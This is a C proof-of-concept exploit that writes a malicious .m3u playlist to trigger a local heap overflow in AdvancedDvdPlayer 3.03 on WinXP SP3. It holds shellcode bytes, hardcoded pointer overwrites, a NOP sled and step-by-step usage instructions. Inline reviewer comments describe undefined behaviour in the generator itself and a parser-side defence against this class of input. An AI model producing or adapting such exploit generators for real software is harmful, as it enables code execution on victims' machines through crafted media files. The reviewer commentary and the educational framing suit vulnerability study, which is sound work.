/*
 * Not so usual exploit method
 * Local heap-overflow exploit
 * An Advanced Exploit For An AdvancedDvdPlayer ;)
 * 02-10-2011
 *
 * AdvancedDvdPlayer 3.03
 * Download Link : http://download.cnet.com/Advanced-DVD-Player/3000-2139_4-10310889.html?tag=mncol;3
 *
 * Tested on WinXP SP3
 *
 * Compile and make a playlist and name it test.m3u, then run this and put the
 * new test.m3u in the \Program Files\AdvancedDVDPlayer folder, then run.
 *
 * Old application, but I wanted to show this way of exploitation for
 * educational purposes.
 *
 * Owned by GoTr00t! mail:aksuumit[AT]hotmail.com
 *
 * Reviewer notes (defensive reading of this PoC):
 *  - Every address embedded in the payload below is absolute (the author's own
 *    "hardcoded" remarks), so the output only matches the environment named
 *    above; the file documents the bug rather than being a general tool.
 *  - The generator itself relies on undefined behaviour (see the comments in
 *    main()), so what it writes is not fully reproducible across compilers.
 *  - The artefact it produces is a playlist whose single entry is a few
 *    hundred 0x90 bytes followed by raw code and a ".mpg" suffix. A playlist
 *    parser that bounds entry length, or a content check rejecting
 *    non-printable bytes in an .m3u, would reject this class of input.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * First-stage payload bytes. Only the first four instructions were annotated
 * by the author; per the trailing note the remainder contains hard-coded
 * addresses, which is what ties the payload to WinXP SP3.
 */
char scode_calc[] =
    "\x33\xDB"  // xor EBX,EBX
    "\x33\xD2"  // xor EDX,EDX
    "\x33\xFF"  // XOR EDI,EDI
    "\x33\xF6"  // XOR ESI,ESI
    "\x33\xC0\x50\x68\x43\x41\x4C\x43"
    "\x8B\xCC\x51\xE8\x10\x92\x53\x76"; // Hardcoded shellcode addresses!

/*
 * Assembles the playlist entry in a stack buffer and writes it to test.m3u in
 * the current directory. Always returns 0; fopen() failure is not checked, so
 * on failure fp is NULL and fprintf()/fclose() dereference it.
 */
int main(){
    /* NOTE(review): `exploit` is never initialised, yet the first strcat()
       below requires a NUL-terminated destination -- undefined behaviour.
       `char exploit[1000] = {0};` is the intended starting state. */
    char exploit[1000];
    char NOPS[303];
    /* Fills all 303 bytes with 0x90 and leaves no terminator, so
       strcat(exploit, NOPS) reads past the end of NOPS (stack contents decide
       where it stops). This is the real cause of the "strange" extra byte
       the author appends after it. */
    memset(NOPS,0x90,sizeof(NOPS));
    char shellcode[] =
        "\x33\xc0\x50\x68\xA0\xA0\xA0\x41"
        "\x68\x57\x4E\x45\x44\x68\x52\x45\xA0\x4F"
        "\x68\x4F\x55\xA0\x41\x68\xA0\xA0\xA0\x59"
        "\x8B\xCC\x50\x51\x51\x50\xE8\xFD\x05\xd6\x7c"; // hardcoded addresses!

    // 016F018C pointer to the pointer (author's note; absolute address)
    char EAX[] = "\x8C\x01\x6F\x01";

    strcat(exploit,"1\n");
    strcat(exploit,NOPS);
    /* Author: "strange but without it my compiler wont compile it good?"
       -- almost certainly the unterminated NOPS above, not the compiler. */
    strcat(exploit,"\x90");
    strcat(exploit,EAX);
    strcat(exploit,"\x6C\x01\x6F\x01"); // 016F016C pointer to the actual call address
    strcat(exploit,"\x94\x01\x6F\x01"); // 016F0194
    strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
    strcat(exploit,scode_calc);
    strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
    strcat(exploit,shellcode);
    strcat(exploit,".mpg\n");

    FILE *fp;
    fp=fopen("test.m3u","w"); // unchecked: NULL if the file cannot be created
    /* NOTE(review): the assembled buffer is passed as the format string. No
       '%' byte occurs in the payload as written, but any such byte would be
       interpreted as a conversion; `fputs(exploit, fp)` (or fwrite() with an
       explicit length) expresses the intent without that hazard. */
    fprintf(fp,exploit);
    fclose(fp);
    return 0;
}